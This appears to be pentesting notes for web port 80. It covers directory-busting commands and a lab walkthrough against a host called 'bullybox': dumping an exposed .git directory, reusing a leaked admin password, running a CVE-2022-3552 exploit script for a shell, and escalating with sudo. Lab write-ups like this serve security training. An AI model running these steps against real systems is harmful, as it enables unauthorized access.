80
Mapping
robots.txt:
.svn:
.DS_STORE
Directory Busting
gobuster dir -u ${ip} -w /usr/share/wordlists/dirb/common.txt -t 5dirbusterferoxbuster -u http://host.domain.tld:80/ -x php -C 404 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt' -B --auto-tunePHP
Check phpinfo or phpmyadmin:
Running dirb we notice: 
There is a git directory
Using git-dumper:
git-dumper http://bullybox.local/.git gitThere is bb-config.php: 
We can login at /bb-admin: 
Logging in with admin@bullybox.local : Playing-Unstylish7-Provided 
Now we can us this exploit
python3 CVE-2022-3552.py -d http://bullybox.local/ -u admin@bullybox.local -p 'Playing-Unstylish7-Provided'After changing the ip: 
Now we get a shell: 
Now check id: 
We are sudo group so with sudo su
Last updated
Was this helpful?